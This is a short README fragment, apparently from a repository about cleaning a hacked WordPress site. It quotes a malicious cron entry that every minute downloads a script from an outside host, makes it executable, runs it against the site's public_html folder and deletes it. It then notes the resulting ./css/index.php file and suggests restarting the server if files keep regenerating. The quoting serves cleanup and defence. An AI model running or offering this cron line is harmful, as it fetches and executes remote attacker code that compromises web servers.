Ankit7791/Clean-Wordpress-Hack/README.md

 * * * * * wget -q -O xxxd http://hello.hahaha666.xyz/xxxd && chmod 0755 xxxd && /bin/sh xxxd /home//username/public_html 24 && rm -f xxxd
 This code create a ./css/index.php file and can be deleted.

+# After All still you website is regenerating index.php or htaccess
+You need to restart your server or Kill all the process that are running for your server